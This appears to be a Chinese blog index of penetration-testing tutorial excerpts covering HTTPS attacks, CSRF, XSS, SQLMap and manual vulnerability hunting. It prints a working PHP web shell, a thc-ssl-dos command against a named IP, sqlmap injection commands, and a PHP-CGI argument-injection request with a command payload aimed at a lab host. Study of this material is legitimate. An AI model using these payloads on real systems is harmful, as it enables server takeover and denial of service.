https攻击-中间人攻击 2020-11-07 11:13:31 | 信息安全渗透测试 HTTPS攻击 全站https正成为潮流趋势 淘宝、百度 HTTPS的作用 CIA 解决的是信息传输过程中数据被篡改、窃取 加密:对称、非对称、单向 HTTPS攻击方法 降级攻击 将高强度算法降级为低强度算法 解密攻击(明文、证书伪造) 协议漏洞、https实现方法的漏洞、配置不严格
WebShell 2020-11-06 11:11:01 | 信息安全渗透测试 <?php echo shell_exec($_GET[‘cmd’]);?> 中国菜刀:http://www.maicaidao.co 可能被IDS、AV、WAF、扫描器软件发现查杀
Web渗透-SSL/TLS拒绝服务、Ajax、WebService 2020-11-05 12:06:05 | 信息安全渗透测试 SSL/TLS拒绝服务攻击 thc-ssl-dos ssl协商加密对性能开销大,大量握手请求会导致拒绝服务 利用SSL secure Renegotiation特性,在单一TCP连接中生成数千个SSL重连接请求,造成服务器资源过载 与流量式拒绝服务攻击不同,thc-ssl-dos可以利用dsl线路打垮30G带宽的服务器 服务器平均可以处理300次/秒SSL握手请求 对SMTPS、POP3S、等服务同样有效 thc-ssl-dos 199.223.209.205 2804 -accept
跨站请求伪造CSRF 2020-10-27 23:40:04 | 信息安全渗透测试 CSRF(Cross-site request forgery) 从信任的角度来区分 XSS:利用用户对站点的信任 CSRF:利用站点对已经身份认证的信任
跨站脚本攻击XSS 2020-10-26 13:26:30 | 信息安全渗透测试 XSS 攻击web客户端 客户端脚本语言 弹窗告警、广告 Javascript 在浏览器中执行 XSS(cross-site scripting) 通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的 注入客户端脚本代码 盗取cookie 重定向
SQLMap自动注入-General等其余参数 2020-10-22 08:43:42 | 信息安全渗透测试 SQLMap自动注入-Injection -p 指定扫描的参数,使–level失效 -p “user-agent,referer” –skip 排除指定的扫描参数 –level=5 –skip=”id,user-agent”
SQLMap自动注入-Request、Optimization 2020-10-21 17:58:32 | 信息安全渗透测试 SQLMap自动注入-Request基本数据 数据段: –data get/post都使用 sqlmap -u “http://1.1.1.1/a.php” –data=”user=1&pass=2”-f 变量分隔符:–param-del http://1.1.1.1/a.php?q=foo;id=1 //用;替换& sqlmap -u “http://1.1.1.1/a.php" –data=”q=foo;id=1” –param-del=”;” -f
SQLMap自动注入-Target 2020-10-20 16:01:59 | 信息安全渗透测试 SQLMap自动注入 开源sql注入漏洞检测、利用工具 检测动态页面中get/post参数、cookie、http头 数据榨取 文件系统访问 操作系统命令执行 引擎强大、特性丰富 Xss漏洞检测
手动漏洞挖掘-命令执行、目录遍历、文件包含、文件上传 2020-10-15 19:08:04 | 信息安全渗透测试 身份认证账号密码 常用弱口令/基于字典的密码爆破 锁定账号 先手动多试几次,如果没有锁定机制,就可以爆破。 信息收集 手机号 密码错误提示信息 一些隐藏的信息比如错误码 去分站搜集账号相关信息
手动漏洞挖掘.默认安装 2020-10-14 17:30:17 | 信息安全渗透测试 手动漏洞挖掘-默认安装 Windows默认安装漏洞 phpMyAdmin/setup MetaSploitable12345678POST http:///phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1Host: 192.168.20.10Content-Length: 40<?phppassthru('pwd&&ls'); die();?>